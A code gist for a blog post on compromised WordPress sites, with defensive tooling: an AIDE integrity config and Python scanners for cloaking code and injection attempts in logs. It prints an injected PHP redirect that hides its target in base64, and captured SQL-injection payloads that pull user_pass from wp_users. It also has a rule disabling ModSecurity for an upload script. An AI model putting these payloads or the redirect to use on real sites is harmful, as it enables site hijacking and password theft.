Last active
January 1, 2016 13:09
Code snippets for the post http://www.aldolat.it/2008/wordpress/il-vostro-sito-wordpress-e-stato-violato/ ("Your WordPress site has been hacked")
<?php // injected cloaking redirect: search-engine visitors with no cookies are sent elsewhere; the base64 string decodes to anyresults.net
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php // the file's original opening tag follows the injected block
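The block above is the injected cloaking code. What follows is an added example, written for this edit and not code from the gist or from the blog post: a small scanner that finds the same pattern across a tree of PHP files and decodes the base64 argument so the operator can see where search-engine visitors were being sent. The three signals it requires together (the referer test against `$_SERVER['HTTP_REFERER']`, the `sizeof($_COOKIE)==0` check and a `base64_decode()` inside a `Location` header) come from the snippet itself; the two sample file contents embedded in the block are constructed, and the `scan_tree()` walker and the signal names are my own choices.

```python
"""Find the search-engine-cloaking redirect shown above in a tree of PHP files.

Added example, not code from the gist or the blog post. A file is reported
only when all three signals of the injected snippet are present; the literal
base64 argument is decoded so the operator can see the redirect target.
"""
import base64
import os
import re
import sys
from typing import Dict, List, Optional, Tuple

# Each signal is one regex; a file must match every signal to be reported.
SIGNALS = {
    # the referer is inspected (the snippet compares it against a search-engine list)
    "referer_check": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]"),
    # the redirect only fires when the visitor carries no cookies at all
    "no_cookie_check": re.compile(r"(?:sizeof|count)\s*\(\s*\$_COOKIE\s*\)\s*==\s*0"),
    # a Location header whose host is hidden inside base64_decode()
    "encoded_redirect": re.compile(r"header\s*\(\s*['\"]Location:[^;]*base64_decode\s*\(", re.I),
}
B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Constructed sample: the injected block from this page, prepended to a PHP file.
INJECTED_SAMPLE = r'''<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php
// ... the file's own code continues here ...
'''

# Constructed sample: a benign file that uses a Location header and base64 separately.
CLEAN_SAMPLE = r'''<?php
if (!is_user_logged_in()) { header("Location: /wp-login.php"); exit; }
$token = base64_decode($_POST['token']);
'''


def decode_targets(source: str) -> List[str]:
    """Return the decoded form of every literal base64_decode() argument in `source`."""
    targets = []
    for enc in B64_ARG.findall(source):
        try:
            targets.append(base64.b64decode(enc, validate=True).decode("utf-8", "replace"))
        except ValueError as exc:  # binascii.Error is a ValueError subclass
            targets.append(f"<undecodable: {exc}>")
    return targets


def scan_source(source: str) -> Optional[Dict[str, List[str]]]:
    """Return {'signals': [...], 'targets': [...]} when every signal matches, else None."""
    matched = [name for name, rx in SIGNALS.items() if rx.search(source)]
    if len(matched) != len(SIGNALS):
        return None
    return {"signals": matched, "targets": decode_targets(source)}


def scan_tree(root: str) -> List[Tuple[str, List[str]]]:
    """Scan every *.php file under `root`; return (path, decoded targets) for each hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = scan_source(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if finding:
                hits.append((path, finding["targets"]))
    return hits


if __name__ == "__main__":
    # Usage: python scan_cloaking.py /home/web/public_html
    for path, targets in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: redirects to {', '.join(targets)}")
```

Requiring all three signals keeps the false-positive rate low on a real theme directory, where `header("Location: ...")` alone is common; a file that matches only one or two of them is still worth a manual look, and the file-integrity check further down the page catches anything this signature misses.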
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Turns ModSecurity off for async-upload.php only (the endpoint behind WordPress 2.5's
# multi-file uploader). These are ModSecurity 1.x directive names; 2.x uses SecRuleEngine Off.
# Caveat: uploads through this script are then not inspected at all.
<IfModule mod_security.c>
<Files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>
POST: Array
(
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
)
HTTP_RAW_POST_DATA: <?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
URL: /wp-trackback.php?tb_id=1
POST: Array
(
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
)
URL: /wp-trackback.php?p=1
POST: Array
(
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
)
<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall>
# Debian/Ubuntu: install AIDE, put the web-tree rules in a conf.d snippet, then build the initial database
apt-get install aide
vi /etc/aide/aide.conf.d/88_aide_web
/usr/sbin/aideinit
# Checksum every file under the web tree (Checksums is the hash-only rule group from Debian's stock aide.conf)
/home/web/ Checksums
# Exclude paths that change on every request: logs and the WordPress page cache
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
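The captured requests on this page (the cookie with `xyz%27`, the `system.multicall` pingback payload, the two `wp-trackback.php` posts and the double-encoded `cat=` queries above) share a few traits a log review can key on. The following is an added example, not code from the gist or the blog post: it normalises every attacker-controlled value the way these attacks rely on (repeated percent-decoding so `%2527` becomes `'`, and UTF-7 decoding when the request declares `charset=UTF-7`, which is how `+AFw-` turns into a backslash) and then matches a handful of injection markers. The request records in the block are constructed from the payloads on this page; the `/xmlrpc.php` path is assumed, the multicall body is completed to well-formed XML, and the marker names and the `run_samples()` helper are my own.

```python
"""Flag SQL-injection probes in captured WordPress requests.

Added example, not code from the gist or the blog post. Every attacker-
controlled value (query string, POST field, cookie, XML-RPC <string>) is
normalised the way the captured attacks rely on, then matched against a few
injection markers. The request records are constructed from this page.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

MARKERS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "user_table": re.compile(r"\bwp_users\b|\buser_pass\b", re.I),
    # a quote that closes a string and is followed by SQL or a comment opener
    "quote_break": re.compile(r"['\"]\s*\)?\s*(?:/\*|;|\bunion\b|\bor\b|\band\b)", re.I),
    # a backslash in front of a quote: the escaping/charset trick
    "escaped_quote": re.compile(r"\\['\"]"),
    # a value that simply ends in a quote is the classic first probe
    "trailing_quote": re.compile(r"['\"]\s*$"),
}


def normalise(value: str, charset: str = "") -> str:
    """Undo the encodings the captured attacks hide behind."""
    # Percent-decode until stable: %2527 -> %27 -> ' (rounds capped on purpose).
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # A declared UTF-7 charset lets +AFw- smuggle a backslash past quote escaping.
    if charset.lower() == "utf-7":
        try:
            value = value.encode("ascii", "ignore").decode("utf-7")
        except UnicodeDecodeError:
            pass  # malformed UTF-7: keep the raw value and let the markers judge it
    return value


def extract_values(req: Dict) -> List[Tuple[str, str]]:
    """Collect every attacker-controlled (name, raw value) pair from a request record."""
    pairs = []
    query = urlsplit(req.get("url", "")).query
    pairs += [(f"query:{k}", v) for k, v in parse_qsl(query, keep_blank_values=True)]
    pairs += [(f"post:{k}", v) for k, v in req.get("post", {}).items()]
    for part in req.get("cookie", "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            pairs.append((f"cookie:{k}", v))
    if "xml" in req:  # XML-RPC body: every <string>, URLs included, is attacker data
        strings = [s.text or "" for s in ET.fromstring(req["xml"]).iter("string")]
        pairs += [(f"xmlrpc:string[{i}]", s) for i, s in enumerate(strings)]
    return pairs


def analyse(req: Dict) -> Dict[str, List[str]]:
    """Map each suspicious parameter name to the marker names it triggered."""
    charset = req.get("post", {}).get("charset", "")
    findings = {}
    for name, raw in extract_values(req):
        hits = [m for m, rx in MARKERS.items() if rx.search(normalise(raw, charset))]
        if hits:
            findings[name] = hits
    return findings


# Constructed: the system.multicall body from this page, completed to well-formed XML
# (the raw '&' in the captured URL has to be '&amp;' for the parser).
XMLRPC_MULTICALL = """<methodCall>
<methodName>system.multicall</methodName>
<params><param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&amp;post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member>
</struct></value>
</data></array></value></param></params>
</methodCall>"""

# Constructed request records built from the captures on this page.
SAMPLE_REQUESTS = [
    {"label": "cookie-quote",  # the page records only the cookie, not the request URL
     "cookie": "wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;"},
    {"label": "xmlrpc-union", "url": "/xmlrpc.php",  # path assumed (WordPress XML-RPC endpoint)
     "xml": XMLRPC_MULTICALL},
    {"label": "trackback-quote", "url": "/wp-trackback.php?tb_id=1",
     "post": {"title": "1", "url": "1", "blog_name": "1", "tb_id": "666666\\'", "1740009377": "1", "496546471": "1"}},
    {"label": "trackback-utf7", "url": "/wp-trackback.php?p=1",
     "post": {"url": "ekibastos", "title": "ekibastos", "excerpt": "ekibastos", "blog_name": "+AFw-\\')/*", "charset": "UTF-7"}},
    {"label": "get-cat-double-encoded",
     "url": "/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/*"},
]


def run_samples() -> Dict[str, Dict[str, List[str]]]:
    """Analyse every constructed request; returns {label: findings}."""
    return {req["label"]: analyse(req) for req in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for label, findings in run_samples().items():
        print(label, "->", findings or "clean")
```

Two points worth noticing when running it: the trackback UTF-7 value only shows its second backslash after decoding with the declared charset, which is exactly what defeated quote escaping in that attack, and the `cat=` query needs two decoding rounds before `UNION SELECT` is even visible, so a filter that decodes once and stops would have let it through.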